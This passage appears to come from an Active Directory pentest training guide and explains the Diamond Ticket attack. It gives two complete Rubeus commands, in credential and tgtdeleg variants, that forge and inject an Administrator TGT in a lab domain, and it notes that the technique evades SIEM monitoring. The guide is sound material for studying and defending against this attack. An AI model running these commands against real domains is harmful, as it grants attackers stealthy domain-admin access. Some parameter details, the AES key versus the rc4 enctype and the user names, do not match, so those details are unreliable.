8.3 - Diamond Ticket

Diamond Ticket (TGT Modification Attack)

A Diamond Ticket is a modified version of a legitimate TGT (Ticket Granting Ticket). Unlike Golden Tickets, which are completely forged from scratch, Diamond Tickets are based on real TGTs that are decrypted, modified, and re-encrypted using the krbtgt account key.


Key Characteristics

  • A Diamond Ticket is a TGT modification attack, whereas a Golden Ticket is a TGT forgery attack.

  • A legitimate TGT is captured and decrypted, its content (e.g., username, groups) is modified, and then it is re-encrypted with the krbtgt AES key.

  • The ticket will have valid timestamps, since they are inherited from a real DC-issued ticket.

  • More stealthy than Golden Tickets because:

    • TGT appears genuinely issued by the DC.

    • TGS requests based on this ticket match an actual TGT.

    • Less detectable by SIEMs and monitoring tools.

  • Persistence duration depends on TGT lifetime and krbtgt key rotation policy.


Forge a Diamond Ticket with Credentials

You can use Rubeus to create a Diamond Ticket using the krbtgt AES key and the credentials of a domain user:

Rubeus.exe diamond /krbkey:d7ac4db5b820be57cc79f58f196a0e5b /user:devan /password:new_password123 /enctype:rc4 /ticketuser:Administrator /domain:dev-angelist.lab /dc:corp-dc.dev-angelist.lab /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Forge a Diamond Ticket Using /tgtdeleg

If you already have a TGT delegation token (captured via Rubeus tgtdeleg), you can generate a Diamond Ticket without needing user credentials:

Rubeus.exe diamond /krbkey:d7ac4db5b820be57cc79f58f196a0e5b /tgtdeleg /enctype:rc4 /ticketuser:Administrator /domain:dev-angelist.lab /dc:corp-dc.dev-angelist.lab /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Parameters Explained

Option
Description

/diamond

Rubeus module for crafting a Diamond Ticket.

/krbkey:<key>

AES256 key of the krbtgt account (required for re-encryption).

/user:studentx + /password:...

Domain user credentials to request the real TGT.

/tgtdeleg

Uses a captured TGT delegation token instead of user credentials.

/ticketuser:administrator

User to impersonate in the new ticket.

/ticketuserid:500

RID of the impersonated user (default 500 = Administrator).

/groups:512

Groups the impersonated user should be a member of.

/domain, /dc

Target domain and Domain Controller.

/enctype:aes

Encryption type (must match the krbtgt key used).

/createnetonly:<path>

Creates a netonly logon session to isolate the context (e.g., spawn cmd).

/show

Displays the forged ticket before injection.

/ptt

Injects the forged ticket into the current session.

Labs

Last updated